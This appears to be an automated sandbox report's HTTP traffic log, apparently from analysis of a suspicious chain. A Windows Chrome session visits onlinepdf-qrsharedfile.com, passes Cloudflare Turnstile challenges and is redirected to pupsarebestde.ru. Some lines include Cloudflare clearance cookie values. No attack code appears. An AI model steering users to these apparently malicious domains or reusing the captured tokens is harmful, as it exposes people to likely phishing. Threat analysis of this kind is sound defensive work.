Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c756beb5be9b5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c756beb5be9b5&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7c756beb5be9b5/1729799042855/9eaf4d3495c5ba95711fc1f736e283be717bddf8fe5bba7780b88bd4e011e1ce/5oS3Z1UwhtQluM6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c756beb5be9b5/1729799042860/HSbT51zwkv1XM2A HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/67v49/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c756beb5be9b5/1729799042860/HSbT51zwkv1XM2A HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1577562326:1729797168:4XUW6U4ilMXE9tFlofjzWIs8fkQ_XTKzF2Tj7VZjhQo/8d7c756beb5be9b5/riMy10U7XDeNcLr_S3lB2nLaXd2_wh8RtSeVIqQ2rYs-1729799036-1.1.1.1-xOf4FlGN6vxQckdYn.7ovk0KR1nOWvb5myyhnCNUQeQn5OKLXN9FXUawXjqbwzh. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: pupsarebestde.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://onlinepdf-qrsharedfile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=uhegHGCPHORYRbC&MD=dbf1VdYs HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=qweYyjRo9tLfqw9_8JVuA9Gm3wL0aTsdw8ZKChA2Q4s-1729799089-1.0.1.1-JGVxc57L2JghxTaYGfFImrgtXG.T69SCyr_cZYZkS4ncLn2OObylfvj7nJg5IToJzLJypa010b93UqePkRRWh_H3BJd5SKNQ08hIGsOXG40
Source: global traffic	HTTP traffic detected: GET /index.html?__cf_chl_rt_tk=XbRjo5Xq4Zr2fPHd95vNFX77QQSuPEGggp9UZs6Epi4-1729799015-1.0.1.1-VZntlvE7VRGZbOuoP83Tv8UkLycQictXRCj_l40D3n8 HTTP/1.1Host: onlinepdf-qrsharedfile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=OXDraUEqE.oshpqJ0CVNa0hea5y9ntFVwq4xqiPOTD4-1729799015-1.2.1.1-VHUw3pPH4AxbTihpO2vzn6bC6S1x.casxD5lYMXHfF0VmCKjpSNSVB8FIRGgrsl7NWGe7gitLHiFGAaoqqRIhsNvT37E4kWr_lthdO._BPFfqOoCTdXDe_xAubhx1ImcrlCSfJ_2DrbzNiXP5me_P9kZX5eA142yMNFKAvkC5WDecRit8dsplU7Ox4B_emYQjLDK73Lvn5dGKnQFNkmhtOE9OG3S8KpBRWh_c_iVT0jyc1koVcjHgvZFBz6.nGi2MJidVWYC_x2nPErJD4Z04MFFZxJwOMoAUObYLq0vkqCpP1uQPYK4I.SzBdXMTan0WitUQXQ2AQ0kd.oUeYaQw8lYN9fDGzs4K24rtEQL_5.xSYPWNSI6dyG9b9KgnOBu7F6UEPIP6FAdnJSfwFS.lI4rJ89O1hilMi5mHbLAczNOxT4HRu6HYXL4Pxn7VDCZ
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c76e74f17e7bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d7c76e74f17e7bb&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c76e74f17e7bb/1729799100472/AvNCA72nHZRr_kB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7c76e74f17e7bb/1729799100472/AvNCA72nHZRr_kB HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7c76e74f17e7bb/1729799100474/e8cc6bfcd974cb047485d94945af125403ea0eba4a6173fefbc168b3d4ab3c67/FSUmaMzuw_psFoU HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/rqmfb/0x4AAAAAAAi2QnDv0mEQkrsX/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1925323196:1729797399:g37pL3I2Fo2Vok7htRJ4WdBDXWx02YngmwxM-TxMTqQ/8d7c76e74f17e7bb/VxrfLBVyqotNu1TZiTOF78m36xVsFK8lt5MsZShVoR8-1729799097-1.1.1.1-o_G2kEpeuA9iEfyTttTXLAh1gKhx8u0tLdGPg3DkkHOjXczfIs15_0NUghOMk2k9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: pupsarebestde.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET // HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://onlinepdf-qrsharedfile.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://pupsarebestde.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pupsarebestde.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: pupsarebestde.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pupsarebestde.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: pupsarebestde.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pupsarebestde.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
